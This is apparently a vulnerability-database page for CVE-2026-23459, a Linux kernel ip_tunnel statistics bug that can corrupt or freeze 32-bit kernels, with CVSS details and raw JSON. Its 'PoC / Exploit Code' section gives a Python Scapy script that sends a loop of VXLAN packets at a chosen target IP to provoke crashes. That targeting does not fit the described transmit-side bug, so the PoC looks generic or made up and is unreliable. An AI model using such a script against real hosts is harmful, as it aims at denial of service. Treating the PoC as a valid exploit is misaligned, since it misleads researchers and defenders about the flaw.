Security Vulnerability Report
中文
CVE-2026-23459 CVSS 8.2 HIGH

CVE-2026-23459

Published: 2026-04-03 16:16:33
Last Modified: 2026-04-27 14:16:34
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: ip_tunnel: adapt iptunnel_xmit_stats() to NETDEV_PCPU_STAT_DSTATS Blamed commits forgot that vxlan/geneve use udp_tunnel[6]_xmit_skb() which call iptunnel_xmit_stats(). iptunnel_xmit_stats() was assuming tunnels were only using NETDEV_PCPU_STAT_TSTATS. @syncp offset in pcpu_sw_netstats and pcpu_dstats is different. 32bit kernels would either have corruptions or freezes if the syncp sequence was overwritten. This patch also moves pcpu_stat_type closer to dev->{t,d}stats to avoid a potential cache line miss since iptunnel_xmit_stats() needs to read it.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H

Configurations (Affected Products)

No configuration data available.

Linux Kernel (包含特定提交的32位架构版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-23459: Triggering iptunnel_xmit_stats via VXLAN # This script requires Scapy: pip install scapy from scapy.all import * import sys def send_vxlan_traffic(target_ip, count=1000): # Craft a basic IP packet ip_packet = IP(dst=target_ip) / ICMP() # Encapsulate in VXLAN (Standard VXLAN port 4789) # VXLAN Header: Flags (0x08 for I flag), VNI (0) vxlan_packet = IP(dst=target_ip) / UDP(dport=4789, sport=12345) / VXLAN(vni=0) / Ether() / ip_packet print(f"[*] Sending {count} VXLAN packets to {target_ip} to trigger stats update...") # Send packets in a loop to trigger the statistics update path frequently for i in range(count): send(vxlan_packet, verbose=0) if i % 100 == 0: print(f"[*] Sent {i} packets...") print("[+] Done. Check kernel logs for instability or crashes.") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve_poc.py <target_ip>") sys.exit(1) target = sys.argv[1] send_vxlan_traffic(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23459", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-03T16:16:32.833", "lastModified": "2026-04-27T14:16:34.493", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nip_tunnel: adapt iptunnel_xmit_stats() to NETDEV_PCPU_STAT_DSTATS\n\nBlamed commits forgot that vxlan/geneve use udp_tunnel[6]_xmit_skb() which\ncall iptunnel_xmit_stats().\n\niptunnel_xmit_stats() was assuming tunnels were only using\nNETDEV_PCPU_STAT_TSTATS.\n\n@syncp offset in pcpu_sw_netstats and pcpu_dstats is different.\n\n32bit kernels would either have corruptions or freezes if the syncp\nsequence was overwritten.\n\nThis patch also moves pcpu_stat_type closer to dev->{t,d}stats to avoid\na potential cache line miss since iptunnel_xmit_stats() needs to read it."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "references": [{"url": "https://git.kernel.org/stable/c/0d087d00161f562d5047cc4009bb0c6a19daf9f1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/8431c602f551549f082bbfa67f3003f2d8e3e132", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.